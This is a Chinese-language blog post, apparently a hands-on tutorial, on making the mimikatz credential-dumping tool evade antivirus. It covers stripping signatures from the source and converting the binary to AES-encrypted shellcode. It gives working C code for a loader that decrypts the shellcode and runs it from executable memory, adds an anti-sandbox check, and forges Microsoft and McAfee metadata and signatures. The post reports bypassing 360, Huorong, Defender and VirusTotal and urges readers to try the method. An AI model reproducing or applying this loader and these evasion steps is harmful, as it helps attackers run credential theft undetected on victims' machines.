峰回路转之mimikatz通杀杀软

alyssa

前言

关于mimikatz，之前有做过一些免杀尝试，但是效果不好，仅仅只能短暂躲避360的查杀，这几天看了很多mimikatz免杀的文章有了一些新的想法，于是再次尝试mimikatz免杀。

整个免杀的过程比较曲折且艰难，先是尝试源码免杀，发现源码免杀比较艰难（mimikatz是一个个非常复杂的项目，想要实现源码免杀，需要不断的定位特征码，然后消除特征，我比较菜，无法通过定位到的特征找到对应的源代码），简易的源码免杀已无法对杀软产生太大的作用，于是做了一些简单的处理后放弃了源码免杀。之前有了解github上有项目可以把exe转换成可执行的shellcode，于是想着尝试利用这个项目把mimikatz转换成shellcode，通过shellcode加载器去执行，这样可能会绕过杀软检测，最后也是实现了不错的免杀效果。

免杀过程

首先进行源码免杀，虽说免杀效果不好，但是处理过的总比不做处理要好一点。下载mimikatz源码，项目地址https://github.com/gentilkiwi/mimikatz,运行mimikatz.sln，需要对vs进行一些修改，右键mimikatz项目名称，选择平台工具集，我的vs是2019，选择2019即可



接着需要安装MFC，在开始界面选择visual Studio Installer运行，点击修改





勾选MFC，其他默认进行安装即可



重新打开mimikatz.sln，右键项目属性修改这几个地方



修改完后保存，右键解决方案，修改配置属性为X64

对mimikatz关键字进行替换把mimikatz替换成mihoutao，大写和小写都进行替换，vs选择编辑-查找和替换-在文件中替换，勾选区分大小写，点全部替换即可





接着对mimikatz作者的信息进行去除，在整个解决方案搜索替换成空即可


替换后为



在mimikatz.c中对mimikatz打开时的输出信息进行修改，修改成你想要的即可，我这里修改后是这样


对mimikaz文件名进行修改，所有的mimikatz命名的文件都修改掉，我修改后是这样子


注意里面有几个.def后缀的文件，修改文件名后，需要在属性-链接器中修改成对应的名称


接着删去mimikatz的资源文件，把.rz和.ico后缀的文件全部删除，删完如下


对mimikatz重新生成，看是否还能正常使用，右键mihoutao（修改后的项目名称）点击重新生成即可，这里一定不要选择重新生成解决方案，否则会编译不成功





运行编译后的程序，抓取hash可以正常使用，源码简单处理完成。



使用项目https://github.com/hasherezade/pe_to_shellcode，把编译后的程序转换成可执行的shellcode，用法：命令行输入pe2shc.exe mihoutao.exe 1.bin，得到shellcode。对shellcode进行处理，还是使用aes加密，把aes加密后的16进制字符串保存到encrypted.txt中。接着就是要写一个loader来对encrypted.txt中的shellcode进行解密并执行。

解密和加密使用的模式和key要保持一致，我使用的ECB模式，key设置为1234567812345678

1. <div>
   
2. </div><div>// ... decrypt函数 ...</div><div>int decrypt(unsigned char* ciphertext, int ciphertext_len, unsigned char* key,</div><div>    unsigned char* plaintext) {</div><div>    EVP_CIPHER_CTX* ctx;</div><div>    int len;</div><div>    int plaintext_len;</div><div>
   
3. </div><div>    // 创建并初始化解密上下文</div><div>    if (!(ctx = EVP_CIPHER_CTX_new())) handleErrors();</div><div>
   
4. </div><div>    // 初始化解密操作</div><div>    if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_128_ecb(), NULL, key, NULL))</div><div>        handleErrors();</div><div>
   
5. </div><div>    // 提供要解密的消息，并获取明文输出</div><div>    if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len))</div><div>        handleErrors();</div><div>    plaintext_len = len;</div><div>
   
6. </div><div>    // 完成解密过程</div><div>    if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) handleErrors();</div><div>    plaintext_len += len;</div><div>
   
7. </div><div>    // 清理</div><div>    EVP_CIPHER_CTX_free(ctx);</div><div>
   
8. </div><div>    return plaintext_len;</div><div>}</div>

复制代码

这里我把encrypted.txt放到项目目录下，通过资源加载的方式对shellcode进行读取，右键资源文件把encrypted.txt加载进来，文件类型TEXT保存即可



需要对资源文件进行修改，打开resource.h，添加#define IDR_ENCRYPTED_TEXT 101



rz文件中检查是否存在这一行，IDR_TEXT1               TEXT                    "encrypted.txt"，没有就添加好



读取资源文件的代码

// 读取资源文件
    HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_ENCRYPTED_TEXT), TEXT("TEXT"));
    if (hRes == NULL) {

        // 处理错误
        return 1;
    }
    HGLOBAL hData = LoadResource(NULL, hRes);
    if (hData == NULL) {

        // 处理错误
        return 1;
    }
    char* data = (char*)LockResource(hData);
    DWORD dataSize = SizeofResource(NULL, hRes);

    // 请确保资源数据是以NULL结尾的字符串
    char* hex_encrypted_shellcode = (char*)malloc(dataSize + 1);
    if (hex_encrypted_shellcode == NULL) {

        perror("malloc");
        return 1;
    }
    memcpy(hex_encrypted_shellcode, data, dataSize);
    hex_encrypted_shellcode[dataSize] = '\0';

解密shellcode并执行

1. 
   
2. // 计算十六进制字符串表示的shellcode的长度
   
3.     size_t hex_shellcode_len = strlen(hex_encrypted_shellcode);
   
4.     // 分配内存以存储二进制形式的shellcode
   
5.     size_t bin_shellcode_len = hex_shellcode_len / 2;
   
6.     unsigned char* bin_encrypted_shellcode = (unsigned char*)malloc(bin_shellcode_len);
   
7.     if (bin_encrypted_shellcode == NULL) {
   
8. 
   
9.         perror("malloc");
   
10.         free(hex_encrypted_shellcode);
    
11.         return 1;
    
12.     }
    
13. 
    
14.     // 将十六进制字符串转换为二进制数据
    
15.     hex_to_bin(hex_encrypted_shellcode, bin_encrypted_shellcode, bin_shellcode_len);
    
16. 
    
17.     // 分配内存以存储解密后的shellcode
    
18.     unsigned char* decrypted_shellcode = (unsigned char*)malloc(bin_shellcode_len); // 使用原始长度
    
19.     if (decrypted_shellcode == NULL) {
    
20. 
    
21.         perror("malloc");
    
22.         free(bin_encrypted_shellcode);
    
23.         free(hex_encrypted_shellcode);
    
24.         return 1;
    
25.     }
    
26. 
    
27.     // 解密shellcode
    
28.     int decrypted_len = decrypt(bin_encrypted_shellcode, bin_shellcode_len, key, decrypted_shellcode);
    
29.     if (decrypted_len == -1) {
    
30. 
    
31.         // 解密失败，处理错误
    
32.         handleErrors();
    
33.         // 清理代码应该在 handleErrors 之前或之后（如果 handleErrors 不退出）
    
34.     }
    
35. 
    
36. 
    
37.     // 分配可执行内存
    
38.     void* exec = VirtualAlloc(0, decrypted_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
39.     if (exec == NULL) {
    
40.         perror("VirtualAlloc");
    
41.         free(decrypted_shellcode);
    
42.         free(bin_encrypted_shellcode);
    
43.         return 1;
    
44.     }
    
45.     memcpy(exec, decrypted_shellcode, decrypted_len);
    
46. 
    
47.     // 转换为函数指针并执行
    
48.     void (*func)() = (void (*)())exec;
    
49.     func();

复制代码

然后再添加反沙箱代码

1. 
   
2. // 获取可执行文件的完整路径
   
3.     if (GetModuleFileName(NULL, exePath, MAX_PATH) == 0) {
   
4.         // 处理错误
   
5.         perror("GetModuleFileName failed");
   
6.         return 1;
   
7.     }
   
8. 
   
9.     // 从可执行文件路径中移除文件名，只留下目录
   
10.     PathRemoveFileSpec(exePath);
    
11. 
    
12.     // 构建1.txt文件的完整路径
    
13.     PathCombine(filePath, exePath, "1.txt");
    
14. 
    
15.     // 检查文件是否存在
    
16.     attributes = GetFileAttributes(filePath);
    
17.     if (attributes == INVALID_FILE_ATTRIBUTES) {
    
18.         // 文件不存在或发生错误
    
19.         perror("GetFileAttributes failed");
    
20.         return 1; // 或者你可以根据需要进行其他处理
    
21.     }

复制代码

这样一个aes解密的loader就完成了，对代码进行编译测试免杀效果，这个时候我遇到一个问题，编译后的exe在defender环境疯狂查杀，一开始我以为是我代码的问题，于是我对关键代码进行注释，一步步排查问题，我把所有函数都注释完了进行编译仍然报毒被杀，这让我百思不得其解，然后我突然想要是不是我这个项目名称的问题，我一开始的项目名称是mimikatz_loader，所以我进入这个项目的文件夹，发现果然存在好几个mimikatz命名的文件，这可能就是defender查杀我的原因



所以我新建了一个项目，重新编译了一下，再次放进defender环境，果然不杀了。所以一定不要用mimikatz作为项目名称，否则就会被杀软认定为恶意程序。这个时候虽然过了静态查杀，但是又出现了另一个问题，我的程序运行之后并没有弹出mimikatz的窗口，弹不出命令行说明无法执行命令，意味着这个loader写的没有意义，这个问题我想了一晚上突然茅塞顿开，想要了一个导致这个问题的原因，那就是我创建的项目是windows桌面应用，而mimikatz是一个命令行工具。在我把程序调整成控制台应用再次编译执行，发现成功弹出mimikatz的命令行，问题解决。最后对mihoutao添加微软的详细信息和McAfee的签名，如下




免杀完成！

免杀效果

360核晶防护环境



火绒环境


defender环境



VT和微步云沙箱测试结果





总结

1.在mimikatz免杀项目中，不要使用mimikatz来对文件或项目命名，否则会碰到杀软的无情查杀。
2.mimikatz本质上是一个命令行工具，创建vs项目要选择控制台应用，这是一个血淋淋的教训，切记切记。
3.AES算法用来做免杀loader非常不错，建议都去尝试下。